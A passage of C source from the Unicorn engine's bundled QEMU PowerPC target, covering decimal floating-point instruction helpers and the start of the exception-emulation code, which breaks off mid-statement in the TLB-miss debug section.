set_dfp##size(t, &dfp.vt); \ } static void RINTX_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); } DFP_HELPER_RINT(drintx, RINTX_PPs, 64) DFP_HELPER_RINT(drintxq, RINTX_PPs, 128) static void RINTN_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_VXSNAN(dfp); } DFP_HELPER_RINT(drintn, RINTN_PPs, 64) DFP_HELPER_RINT(drintnq, RINTN_PPs, 128) void helper_dctdp(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; ppc_vsr_t vb; uint32_t b_short; get_dfp64(&vb, b); b_short = (uint32_t)vb.VsrD(1); dfp_prepare_decimal64(&dfp, 0, 0, env); decimal32ToNumber((decimal32 *)&b_short, &dfp.t); dfp_finalize_decimal64(&dfp); set_dfp64(t, &dfp.vt); dfp_set_FPRF_from_FRT(&dfp); } void helper_dctqpq(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; ppc_vsr_t vb; dfp_prepare_decimal128(&dfp, 0, 0, env); get_dfp64(&vb, b); decimal64ToNumber((decimal64 *)&vb.VsrD(1), &dfp.t); dfp_check_for_VXSNAN_and_convert_to_QNaN(&dfp); dfp_set_FPRF_from_FRT(&dfp); dfp_finalize_decimal128(&dfp); set_dfp128(t, &dfp.vt); } void helper_drsp(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; uint32_t t_short = 0; ppc_vsr_t vt; dfp_prepare_decimal64(&dfp, 0, b, env); decimal32FromNumber((decimal32 *)&t_short, &dfp.b, &dfp.context); decimal32ToNumber((decimal32 *)&t_short, &dfp.t); dfp_set_FPRF_from_FRT_short(&dfp); dfp_check_for_OX(&dfp); dfp_check_for_UX(&dfp); dfp_check_for_XX(&dfp); vt.VsrD(1) = (uint64_t)t_short; set_dfp64(t, &vt); } void helper_drdpq(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; dfp_prepare_decimal128(&dfp, 0, b, env); 
decimal64FromNumber((decimal64 *)&dfp.vt.VsrD(1), &dfp.b, &dfp.context); decimal64ToNumber((decimal64 *)&dfp.vt.VsrD(1), &dfp.t); dfp_check_for_VXSNAN_and_convert_to_QNaN(&dfp); dfp_set_FPRF_from_FRT_long(&dfp); dfp_check_for_OX(&dfp); dfp_check_for_UX(&dfp); dfp_check_for_XX(&dfp); dfp.vt.VsrD(0) = dfp.vt.VsrD(1) = 0; dfp_finalize_decimal64(&dfp); set_dfp128(t, &dfp.vt); } #define DFP_HELPER_CFFIX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ ppc_vsr_t vb; \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ get_dfp64(&vb, b); \ decNumberFromInt64(&dfp.t, (int64_t)vb.VsrD(1)); \ dfp_finalize_decimal##size(&dfp); \ CFFIX_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } static void CFFIX_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_XX(dfp); } DFP_HELPER_CFFIX(dcffix, 64) DFP_HELPER_CFFIX(dcffixq, 128) #define DFP_HELPER_CTFIX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ uint64_t invalid_flags = FP_VX | FP_VXCVI; \ if (decNumberIsInfinite(&dfp.b)) { \ dfp.vt.VsrD(1) = decNumberIsNegative(&dfp.b) ? INT64_MIN : \ INT64_MAX; \ } else { /* NaN */ \ dfp.vt.VsrD(1) = INT64_MIN; \ if (decNumberIsSNaN(&dfp.b)) { \ invalid_flags |= FP_VXSNAN; \ } \ } \ dfp_set_FPSCR_flag(&dfp, invalid_flags, FP_VE); \ } else if (unlikely(decNumberIsZero(&dfp.b))) { \ dfp.vt.VsrD(1) = 0; \ } else { \ decNumberToIntegralExact(&dfp.b, &dfp.b, &dfp.context); \ dfp.vt.VsrD(1) = decNumberIntegralToInt64(&dfp.b, &dfp.context); \ if (decContextTestStatus(&dfp.context, DEC_Invalid_operation)) { \ dfp.vt.VsrD(1) = decNumberIsNegative(&dfp.b) ? INT64_MIN : \ INT64_MAX; \ dfp_set_FPSCR_flag(&dfp, FP_VX | FP_VXCVI, FP_VE); \ } else { \ dfp_check_for_XX(&dfp); \ } \ } \ \ set_dfp64(t, &dfp.vt); \ } DFP_HELPER_CTFIX(dctfix, 64) DFP_HELPER_CTFIX(dctfixq, 128) static inline void dfp_set_bcd_digit_64(ppc_vsr_t *t, uint8_t digit, unsigned n) { t->VsrD(1) |= ((uint64_t)(digit & 0xF) << (n << 2)); } static inline void dfp_set_bcd_digit_128(ppc_vsr_t *t, uint8_t digit, unsigned n) { t->VsrD((n & 0x10) ? 0 : 1) |= ((uint64_t)(digit & 0xF) << ((n & 15) << 2)); } static inline void dfp_set_sign_64(ppc_vsr_t *t, uint8_t sgn) { t->VsrD(1) <<= 4; t->VsrD(1) |= (sgn & 0xF); } static inline void dfp_set_sign_128(ppc_vsr_t *t, uint8_t sgn) { t->VsrD(0) <<= 4; t->VsrD(0) |= (t->VsrD(1) >> 60); t->VsrD(1) <<= 4; t->VsrD(1) |= (sgn & 0xF); } #define DFP_HELPER_DEDPD(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t sp) \ { \ struct PPC_DFP dfp; \ uint8_t digits[34]; \ int i, N; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ decNumberGetBCD(&dfp.b, digits); \ dfp.vt.VsrD(0) = dfp.vt.VsrD(1) = 0; \ N = dfp.b.digits; \ \ for (i = 0; (i < N) && (i < (size)/4); i++) { \ dfp_set_bcd_digit_##size(&dfp.vt, digits[N - i - 1], i); \ } \ \ if (sp & 2) { \ uint8_t sgn; \ \ if (decNumberIsNegative(&dfp.b)) { \ sgn = 0xD; \ } else { \ sgn = ((sp & 1) ? 0xF : 0xC); \ } \ dfp_set_sign_##size(&dfp.vt, sgn); \ } \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_DEDPD(ddedpd, 64) DFP_HELPER_DEDPD(ddedpdq, 128) static inline uint8_t dfp_get_bcd_digit_64(ppc_vsr_t *t, unsigned n) { return t->VsrD(1) >> ((n << 2) & 63) & 15; } static inline uint8_t dfp_get_bcd_digit_128(ppc_vsr_t *t, unsigned n) { return t->VsrD((n & 0x10) ? 
0 : 1) >> ((n << 2) & 63) & 15; } #define DFP_HELPER_ENBCD(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t s) \ { \ struct PPC_DFP dfp; \ uint8_t digits[32]; \ int n = 0, offset = 0, sgn = 0, nonzero = 0; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ decNumberZero(&dfp.t); \ \ if (s) { \ uint8_t sgnNibble = dfp_get_bcd_digit_##size(&dfp.vb, offset++); \ switch (sgnNibble) { \ case 0xD: \ case 0xB: \ sgn = 1; \ break; \ case 0xC: \ case 0xF: \ case 0xA: \ case 0xE: \ sgn = 0; \ break; \ default: \ dfp_set_FPSCR_flag(&dfp, FP_VX | FP_VXCVI, FPSCR_VE); \ return; \ } \ } \ \ while (offset < (size) / 4) { \ n++; \ digits[(size) / 4 - n] = dfp_get_bcd_digit_##size(&dfp.vb, \ offset++); \ if (digits[(size) / 4 - n] > 10) { \ dfp_set_FPSCR_flag(&dfp, FP_VX | FP_VXCVI, FPSCR_VE); \ return; \ } else { \ nonzero |= (digits[(size) / 4 - n] > 0); \ } \ } \ \ if (nonzero) { \ decNumberSetBCD(&dfp.t, digits + ((size) / 4) - n, n); \ } \ \ if (s && sgn) { \ dfp.t.bits |= DECNEG; \ } \ dfp_finalize_decimal##size(&dfp); \ dfp_set_FPRF_from_FRT(&dfp); \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_ENBCD(denbcd, 64) DFP_HELPER_ENBCD(denbcdq, 128) #define DFP_HELPER_XEX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ ppc_vsr_t vt; \ \ memset(&dfp, 0, sizeof(dfp)); \ memset(&vt, 0, sizeof(vt)); \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ if (decNumberIsInfinite(&dfp.b)) { \ vt.VsrD(1) = -1; \ } else if (decNumberIsSNaN(&dfp.b)) { \ vt.VsrD(1) = -3; \ } else if (decNumberIsQNaN(&dfp.b)) { \ vt.VsrD(1) = -2; \ } else { \ assert(0); \ } \ set_dfp64(t, &vt); \ } else { \ if ((size) == 64) { \ vt.VsrD(1) = dfp.b.exponent + 398; \ } else if ((size) == 128) { \ vt.VsrD(1) = dfp.b.exponent + 6176; \ } else { \ assert(0); \ } \ set_dfp64(t, &vt); \ } \ } DFP_HELPER_XEX(dxex, 64) DFP_HELPER_XEX(dxexq, 128) static void dfp_set_raw_exp_64(ppc_vsr_t *t, uint64_t raw) { t->VsrD(1) &= 0x8003ffffffffffffULL; t->VsrD(1) |= (raw << (63 - 13)); } static void dfp_set_raw_exp_128(ppc_vsr_t *t, uint64_t raw) { t->VsrD(0) &= 0x80003fffffffffffULL; t->VsrD(0) |= (raw << (63 - 17)); } #define DFP_HELPER_IEX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ uint64_t raw_qnan, raw_snan, raw_inf, max_exp; \ ppc_vsr_t va; \ int bias; \ int64_t exp; \ \ get_dfp64(&va, a); \ exp = (int64_t)va.VsrD(1); \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ if ((size) == 64) { \ max_exp = 767; \ raw_qnan = 0x1F00; \ raw_snan = 0x1F80; \ raw_inf = 0x1E00; \ bias = 398; \ } else if ((size) == 128) { \ max_exp = 12287; \ raw_qnan = 0x1f000; \ raw_snan = 0x1f800; \ raw_inf = 0x1e000; \ bias = 6176; \ } else { \ assert(0); \ } \ \ if (unlikely((exp < 0) || (exp > max_exp))) { \ dfp.vt.VsrD(0) = dfp.vb.VsrD(0); \ dfp.vt.VsrD(1) = dfp.vb.VsrD(1); \ if (exp == -1) { \ dfp_set_raw_exp_##size(&dfp.vt, raw_inf); \ } else if (exp == -3) { \ dfp_set_raw_exp_##size(&dfp.vt, raw_snan); \ } else { \ dfp_set_raw_exp_##size(&dfp.vt, raw_qnan); \ } \ } else { \ dfp.t = dfp.b; \ if (unlikely(decNumberIsSpecial(&dfp.t))) { \ dfp.t.bits &= ~DECSPECIAL; \ } \ dfp.t.exponent = exp - bias; \ dfp_finalize_decimal##size(&dfp); \ } \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_IEX(diex, 64) DFP_HELPER_IEX(diexq, 128) static void dfp_clear_lmd_from_g5msb(uint64_t *t) { /* The most significant 5 bits of the PowerPC DFP format combine bits */ /* from the 
left-most decimal digit (LMD) and the biased exponent. */ /* This routine clears the LMD bits while preserving the exponent */ /* bits. See "Figure 80: Encoding of bits 0:4 of the G field for */ /* Finite Numbers" in the Power ISA for additional details. */ uint64_t g5msb = (*t >> 58) & 0x1F; if ((g5msb >> 3) < 3) { /* LMD in [0-7] ? */ *t &= ~(7ULL << 58); } else { switch (g5msb & 7) { case 0: case 1: g5msb = 0; break; case 2: case 3: g5msb = 0x8; break; case 4: case 5: g5msb = 0x10; break; case 6: g5msb = 0x1E; break; case 7: g5msb = 0x1F; break; } *t &= ~(0x1fULL << 58); *t |= (g5msb << 58); } } #define DFP_HELPER_SHIFT(op, size, shift_left) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ uint32_t sh) \ { \ struct PPC_DFP dfp; \ unsigned max_digits = ((size) == 64) ? 16 : 34; \ \ dfp_prepare_decimal##size(&dfp, a, 0, env); \ \ if (sh <= max_digits) { \ \ decNumber shd; \ unsigned special = dfp.a.bits & DECSPECIAL; \ \ if (shift_left) { \ decNumberFromUInt32(&shd, sh); \ } else { \ decNumberFromInt32(&shd, -((int32_t)sh)); \ } \ \ dfp.a.bits &= ~DECSPECIAL; \ decNumberShift(&dfp.t, &dfp.a, &shd, &dfp.context); \ \ dfp.t.bits |= special; \ if (special && (dfp.t.digits >= max_digits)) { \ dfp.t.digits = max_digits - 1; \ } \ \ dfp_finalize_decimal##size(&dfp); \ } else { \ if ((size) == 64) { \ dfp.vt.VsrD(1) = dfp.va.VsrD(1) & \ 0xFFFC000000000000ULL; \ dfp_clear_lmd_from_g5msb(&dfp.vt.VsrD(1)); \ } else { \ dfp.vt.VsrD(0) = dfp.va.VsrD(0) & \ 0xFFFFC00000000000ULL; \ dfp_clear_lmd_from_g5msb(&dfp.vt.VsrD(0)); \ dfp.vt.VsrD(1) = 0; \ } \ } \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_SHIFT(dscli, 64, 1) DFP_HELPER_SHIFT(dscliq, 128, 1) DFP_HELPER_SHIFT(dscri, 64, 0) DFP_HELPER_SHIFT(dscriq, 128, 0)

unicorn-2.1.1/qemu/target/ppc/excp_helper.c

/* * PowerPC exception emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "internal.h" #include "helper_regs.h" /* #define DEBUG_OP */ /* #define DEBUG_SOFTWARE_TLB */ /* #define DEBUG_EXCEPTIONS */ #ifdef DEBUG_EXCEPTIONS # define LOG_EXCP(...) qemu_log(__VA_ARGS__) #else # define LOG_EXCP(...)
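/* expands to a no-op that still discards its arguments */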
do { } while (0) #endif /*****************************************************************************/ /* Exception processing */ static inline void dump_syscall(CPUPPCState *env) { qemu_log_mask(CPU_LOG_INT, "syscall r0=%016" PRIx64 " r3=%016" PRIx64 " r4=%016" PRIx64 " r5=%016" PRIx64 " r6=%016" PRIx64 " nip=" TARGET_FMT_lx "\n", ppc_dump_gpr(env, 0), ppc_dump_gpr(env, 3), ppc_dump_gpr(env, 4), ppc_dump_gpr(env, 5), ppc_dump_gpr(env, 6), env->nip); } static int powerpc_reset_wakeup(CPUState *cs, CPUPPCState *env, int excp, target_ulong *msr) { /* We no longer are in a PM state */ env->resume_as_sreset = false; /* Pretend to be returning from doze always as we don't lose state */ *msr |= (0x1ull << (63 - 47)); /* Machine checks are sent normally */ if (excp == POWERPC_EXCP_MCHECK) { return excp; } switch (excp) { case POWERPC_EXCP_RESET: *msr |= 0x4ull << (63 - 45); break; case POWERPC_EXCP_EXTERNAL: *msr |= 0x8ull << (63 - 45); break; case POWERPC_EXCP_DECR: *msr |= 0x6ull << (63 - 45); break; case POWERPC_EXCP_SDOOR: *msr |= 0x5ull << (63 - 45); break; case POWERPC_EXCP_SDOOR_HV: *msr |= 0x3ull << (63 - 45); break; case POWERPC_EXCP_HV_MAINT: *msr |= 0xaull << (63 - 45); break; case POWERPC_EXCP_HVIRT: *msr |= 0x9ull << (63 - 45); break; default: cpu_abort(cs, "Unsupported exception %d in Power Save mode\n", excp); } return POWERPC_EXCP_RESET; } static uint64_t ppc_excp_vector_offset(CPUState *cs, int ail) { uint64_t offset = 0; switch (ail) { case AIL_NONE: break; case AIL_0001_8000: offset = 0x18000; break; case AIL_C000_0000_0000_4000: offset = 0xc000000000004000ull; break; default: cpu_abort(cs, "Invalid AIL combination %d\n", ail); break; } return offset; } static inline void powerpc_set_excp_state(PowerPCCPU *cpu, target_ulong vector, target_ulong msr) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; /* * We don't use hreg_store_msr here as already have treated any * special case that could occur. Just store MSR and update hflags * * Note: We *MUST* not use hreg_store_msr() as-is anyway because it * will prevent setting of the HV bit which some exceptions might need * to do. 
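* * Also note: masking with msr_mask below strips any MSR bits this CPU model does not implement.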
*/ env->msr = msr & env->msr_mask; hreg_compute_hflags(env); env->nip = vector; /* Reset exception state */ cs->exception_index = POWERPC_EXCP_NONE; env->error_code = 0; /* Reset the reservation */ env->reserve_addr = -1; /* * Any interrupt is context synchronizing, check if TCG TLB needs * a delayed flush on ppc64 */ check_tlb_flush(env, false); } /* * Note that this function should be greatly optimized when called * with a constant excp, from ppc_hw_interrupt */ static inline void powerpc_excp(PowerPCCPU *cpu, int excp_model, int excp) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; target_ulong msr, new_msr, vector; int srr0, srr1, asrr0, asrr1, lev, ail; bool lpes0; qemu_log_mask(CPU_LOG_INT, "Raise exception at " TARGET_FMT_lx " => %08x (%02x)\n", env->nip, excp, env->error_code); /* new srr1 value excluding must-be-zero bits */ if (excp_model == POWERPC_EXCP_BOOKE) { msr = env->msr; } else { msr = env->msr & ~0x783f0000ULL; } /* * new interrupt handler msr preserves existing HV and ME unless * explicitly overriden */ new_msr = env->msr & (((target_ulong)1 << MSR_ME) | MSR_HVB); /* target registers */ srr0 = SPR_SRR0; srr1 = SPR_SRR1; asrr0 = -1; asrr1 = -1; /* * check for special resume at 0x100 from doze/nap/sleep/winkle on * P7/P8/P9 */ if (env->resume_as_sreset) { excp = powerpc_reset_wakeup(cs, env, excp, &msr); } /* * Exception targetting modifiers * * LPES0 is supported on POWER7/8/9 * LPES1 is not supported (old iSeries mode) * * On anything else, we behave as if LPES0 is 1 * (externals don't alter MSR:HV) * * AIL is initialized here but can be cleared by * selected exceptions */ #if defined(TARGET_PPC64) if (excp_model == POWERPC_EXCP_POWER7 || excp_model == POWERPC_EXCP_POWER8 || excp_model == POWERPC_EXCP_POWER9) { lpes0 = !!(env->spr[SPR_LPCR] & LPCR_LPES0); if (excp_model != POWERPC_EXCP_POWER7) { ail = (env->spr[SPR_LPCR] & LPCR_AIL) >> LPCR_AIL_SHIFT; } else { ail = 0; } } else #endif /* defined(TARGET_PPC64) */ { lpes0 = true; ail = 0; } /* * Hypervisor emulation assistance interrupt only exists on server * arch 2.05 server or later. We also don't want to generate it if * we don't have HVB in msr_mask (PAPR mode). */ if (excp == POWERPC_EXCP_HV_EMU #if defined(TARGET_PPC64) && !((env->mmu_model & POWERPC_MMU_64) && (env->msr_mask & MSR_HVB)) #endif /* defined(TARGET_PPC64) */ ) { excp = POWERPC_EXCP_PROGRAM; } switch (excp) { case POWERPC_EXCP_NONE: /* Should never happen */ return; case POWERPC_EXCP_CRITICAL: /* Critical input */ switch (excp_model) { case POWERPC_EXCP_40x: srr0 = SPR_40x_SRR2; srr1 = SPR_40x_SRR3; break; case POWERPC_EXCP_BOOKE: srr0 = SPR_BOOKE_CSRR0; srr1 = SPR_BOOKE_CSRR1; break; case POWERPC_EXCP_G2: break; default: goto excp_invalid; } break; case POWERPC_EXCP_MCHECK: /* Machine check exception */ if (msr_me == 0) { /* * Machine check exception is not enabled. Enter * checkstop state. */ fprintf(stderr, "Machine check while not allowed. " "Entering checkstop state\n"); #if 0 if (qemu_log_separate()) { qemu_log("Machine check while not allowed. " "Entering checkstop state\n"); } #endif cs->halted = 1; cpu_interrupt_exittb(cs); } if (env->msr_mask & MSR_HVB) { /* * ISA specifies HV, but can be delivered to guest with HV * clear (e.g., see FWNMI in PAPR). 
*/ new_msr |= (target_ulong)MSR_HVB; } ail = 0; /* machine check exceptions don't have ME set */ new_msr &= ~((target_ulong)1 << MSR_ME); /* XXX: should also have something loaded in DAR / DSISR */ switch (excp_model) { case POWERPC_EXCP_40x: srr0 = SPR_40x_SRR2; srr1 = SPR_40x_SRR3; break; case POWERPC_EXCP_BOOKE: /* FIXME: choose one or the other based on CPU type */ srr0 = SPR_BOOKE_MCSRR0; srr1 = SPR_BOOKE_MCSRR1; asrr0 = SPR_BOOKE_CSRR0; asrr1 = SPR_BOOKE_CSRR1; break; default: break; } break; case POWERPC_EXCP_DSI: /* Data storage exception */ LOG_EXCP("DSI exception: DSISR=" TARGET_FMT_lx" DAR=" TARGET_FMT_lx "\n", env->spr[SPR_DSISR], env->spr[SPR_DAR]); break; case POWERPC_EXCP_ISI: /* Instruction storage exception */ LOG_EXCP("ISI exception: msr=" TARGET_FMT_lx ", nip=" TARGET_FMT_lx "\n", msr, env->nip); msr |= env->error_code; break; case POWERPC_EXCP_EXTERNAL: /* External input */ cs = CPU(cpu); if (!lpes0) { new_msr |= (target_ulong)MSR_HVB; new_msr |= env->msr & ((target_ulong)1 << MSR_RI); srr0 = SPR_HSRR0; srr1 = SPR_HSRR1; } if (env->mpic_proxy) { /* IACK the IRQ on delivery */ #ifdef UNICORN_ARCH_POSTFIX env->spr[SPR_BOOKE_EPR] = glue(ldl_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, env->mpic_iack); #else env->spr[SPR_BOOKE_EPR] = ldl_phys(cs->uc, cs->as, env->mpic_iack); #endif } break; case POWERPC_EXCP_ALIGN: /* Alignment exception */ /* Get rS/rD and rA from faulting opcode */ /* * Note: the opcode fields will not be set properly for a * direct store load/store, but nobody cares as nobody * actually uses direct store segments. */ env->spr[SPR_DSISR] |= (env->error_code & 0x03FF0000) >> 16; break; case POWERPC_EXCP_PROGRAM: /* Program exception */ switch (env->error_code & ~0xF) { case POWERPC_EXCP_FP: if ((msr_fe0 == 0 && msr_fe1 == 0) || msr_fp == 0) { LOG_EXCP("Ignore floating point exception\n"); cs->exception_index = POWERPC_EXCP_NONE; env->error_code = 0; return; } /* * FP exceptions always have NIP pointing to the faulting * instruction, so always use store_next and claim we are * precise in the MSR. */ msr |= 0x00100000; env->spr[SPR_BOOKE_ESR] = ESR_FP; break; case POWERPC_EXCP_INVAL: LOG_EXCP("Invalid instruction at " TARGET_FMT_lx "\n", env->nip); msr |= 0x00080000; env->spr[SPR_BOOKE_ESR] = ESR_PIL; break; case POWERPC_EXCP_PRIV: msr |= 0x00040000; env->spr[SPR_BOOKE_ESR] = ESR_PPR; break; case POWERPC_EXCP_TRAP: msr |= 0x00020000; env->spr[SPR_BOOKE_ESR] = ESR_PTR; break; default: /* Should never occur */ cpu_abort(cs, "Invalid program exception %d. 
Aborting\n", env->error_code); break; } break; case POWERPC_EXCP_SYSCALL: /* System call exception */ dump_syscall(env); lev = env->error_code; /* * We need to correct the NIP which in this case is supposed * to point to the next instruction */ env->nip += 4; #if 0 /* "PAPR mode" built-in hypercall emulation */ if ((lev == 1) && cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->hypercall(cpu->vhyp, cpu); return; } #endif if (lev == 1) { new_msr |= (target_ulong)MSR_HVB; } break; case POWERPC_EXCP_FPU: /* Floating-point unavailable exception */ case POWERPC_EXCP_APU: /* Auxiliary processor unavailable */ case POWERPC_EXCP_DECR: /* Decrementer exception */ break; case POWERPC_EXCP_FIT: /* Fixed-interval timer interrupt */ /* FIT on 4xx */ LOG_EXCP("FIT exception\n"); break; case POWERPC_EXCP_WDT: /* Watchdog timer interrupt */ LOG_EXCP("WDT exception\n"); switch (excp_model) { case POWERPC_EXCP_BOOKE: srr0 = SPR_BOOKE_CSRR0; srr1 = SPR_BOOKE_CSRR1; break; default: break; } break; case POWERPC_EXCP_DTLB: /* Data TLB error */ case POWERPC_EXCP_ITLB: /* Instruction TLB error */ break; case POWERPC_EXCP_DEBUG: /* Debug interrupt */ if (env->flags & POWERPC_FLAG_DE) { /* FIXME: choose one or the other based on CPU type */ srr0 = SPR_BOOKE_DSRR0; srr1 = SPR_BOOKE_DSRR1; asrr0 = SPR_BOOKE_CSRR0; asrr1 = SPR_BOOKE_CSRR1; /* DBSR already modified by caller */ } else { cpu_abort(cs, "Debug exception triggered on unsupported model\n"); } break; case POWERPC_EXCP_SPEU: /* SPE/embedded floating-point unavailable */ env->spr[SPR_BOOKE_ESR] = ESR_SPV; break; case POWERPC_EXCP_EFPDI: /* Embedded floating-point data interrupt */ /* XXX: TODO */ cpu_abort(cs, "Embedded floating point data exception " "is not implemented yet !\n"); env->spr[SPR_BOOKE_ESR] = ESR_SPV; break; case POWERPC_EXCP_EFPRI: /* Embedded floating-point round interrupt */ /* XXX: TODO */ cpu_abort(cs, "Embedded floating point round exception " "is not implemented yet !\n"); env->spr[SPR_BOOKE_ESR] = ESR_SPV; break; case POWERPC_EXCP_EPERFM: /* Embedded performance monitor interrupt */ /* XXX: TODO */ cpu_abort(cs, "Performance counter exception is not implemented yet !\n"); break; case POWERPC_EXCP_DOORI: /* Embedded doorbell interrupt */ break; case POWERPC_EXCP_DOORCI: /* Embedded doorbell critical interrupt */ srr0 = SPR_BOOKE_CSRR0; srr1 = SPR_BOOKE_CSRR1; break; case POWERPC_EXCP_RESET: /* System reset exception */ /* A power-saving exception sets ME, otherwise it is unchanged */ if (msr_pow) { /* indicate that we resumed from power save mode */ msr |= 0x10000; new_msr |= ((target_ulong)1 << MSR_ME); } if (env->msr_mask & MSR_HVB) { /* * ISA specifies HV, but can be delivered to guest with HV * clear (e.g., see FWNMI in PAPR, NMI injection in QEMU). 
*/ new_msr |= (target_ulong)MSR_HVB; } else { if (msr_pow) { cpu_abort(cs, "Trying to deliver power-saving system reset " "exception %d with no HV support\n", excp); } } ail = 0; break; case POWERPC_EXCP_DSEG: /* Data segment exception */ case POWERPC_EXCP_ISEG: /* Instruction segment exception */ case POWERPC_EXCP_TRACE: /* Trace exception */ break; case POWERPC_EXCP_HDECR: /* Hypervisor decrementer exception */ case POWERPC_EXCP_HDSI: /* Hypervisor data storage exception */ case POWERPC_EXCP_HISI: /* Hypervisor instruction storage exception */ case POWERPC_EXCP_HDSEG: /* Hypervisor data segment exception */ case POWERPC_EXCP_HISEG: /* Hypervisor instruction segment exception */ case POWERPC_EXCP_SDOOR_HV: /* Hypervisor Doorbell interrupt */ case POWERPC_EXCP_HV_EMU: case POWERPC_EXCP_HVIRT: /* Hypervisor virtualization */ srr0 = SPR_HSRR0; srr1 = SPR_HSRR1; new_msr |= (target_ulong)MSR_HVB; new_msr |= env->msr & ((target_ulong)1 << MSR_RI); break; case POWERPC_EXCP_VPU: /* Vector unavailable exception */ case POWERPC_EXCP_VSXU: /* VSX unavailable exception */ case POWERPC_EXCP_FU: /* Facility unavailable exception */ #ifdef TARGET_PPC64 env->spr[SPR_FSCR] |= ((target_ulong)env->error_code << 56); #endif break; case POWERPC_EXCP_HV_FU: /* Hypervisor Facility Unavailable Exception */ #ifdef TARGET_PPC64 env->spr[SPR_HFSCR] |= ((target_ulong)env->error_code << FSCR_IC_POS); srr0 = SPR_HSRR0; srr1 = SPR_HSRR1; new_msr |= (target_ulong)MSR_HVB; new_msr |= env->msr & ((target_ulong)1 << MSR_RI); #endif break; case POWERPC_EXCP_PIT: /* Programmable interval timer interrupt */ LOG_EXCP("PIT exception\n"); break; case POWERPC_EXCP_IO: /* IO error exception */ /* XXX: TODO */ cpu_abort(cs, "601 IO error exception is not implemented yet !\n"); break; case POWERPC_EXCP_RUNM: /* Run mode exception */ /* XXX: TODO */ cpu_abort(cs, "601 run mode exception is not implemented yet !\n"); break; case POWERPC_EXCP_EMUL: /* Emulation trap exception */ /* XXX: TODO */ cpu_abort(cs, "602 emulation trap exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_IFTLB: /* Instruction fetch TLB error */ switch (excp_model) { case POWERPC_EXCP_602: case POWERPC_EXCP_603: case POWERPC_EXCP_603E: case POWERPC_EXCP_G2: goto tlb_miss_tgpr; case POWERPC_EXCP_7x5: goto tlb_miss; case POWERPC_EXCP_74xx: goto tlb_miss_74xx; default: cpu_abort(cs, "Invalid instruction TLB miss exception\n"); break; } break; case POWERPC_EXCP_DLTLB: /* Data load TLB miss */ switch (excp_model) { case POWERPC_EXCP_602: case POWERPC_EXCP_603: case POWERPC_EXCP_603E: case POWERPC_EXCP_G2: goto tlb_miss_tgpr; case POWERPC_EXCP_7x5: goto tlb_miss; case POWERPC_EXCP_74xx: goto tlb_miss_74xx; default: cpu_abort(cs, "Invalid data load TLB miss exception\n"); break; } break; case POWERPC_EXCP_DSTLB: /* Data store TLB miss */ switch (excp_model) { case POWERPC_EXCP_602: case POWERPC_EXCP_603: case POWERPC_EXCP_603E: case POWERPC_EXCP_G2: tlb_miss_tgpr: /* Swap temporary saved registers with GPRs */ if (!(new_msr & ((target_ulong)1 << MSR_TGPR))) { new_msr |= (target_ulong)1 << MSR_TGPR; hreg_swap_gpr_tgpr(env); } goto tlb_miss; case POWERPC_EXCP_7x5: tlb_miss: #if defined(DEBUG_SOFTWARE_TLB) if (qemu_log_enabled()) { const char *es; target_ulong *miss, *cmp; int en; if (excp == POWERPC_EXCP_IFTLB) { es = "I"; en = 'I'; miss = &env->spr[SPR_IMISS]; cmp = &env->spr[SPR_ICMP]; } else { if (excp == POWERPC_EXCP_DLTLB) { es = "DL"; } else { es = "DS"; } en = 'D'; miss = &env->spr[SPR_DMISS]; cmp = 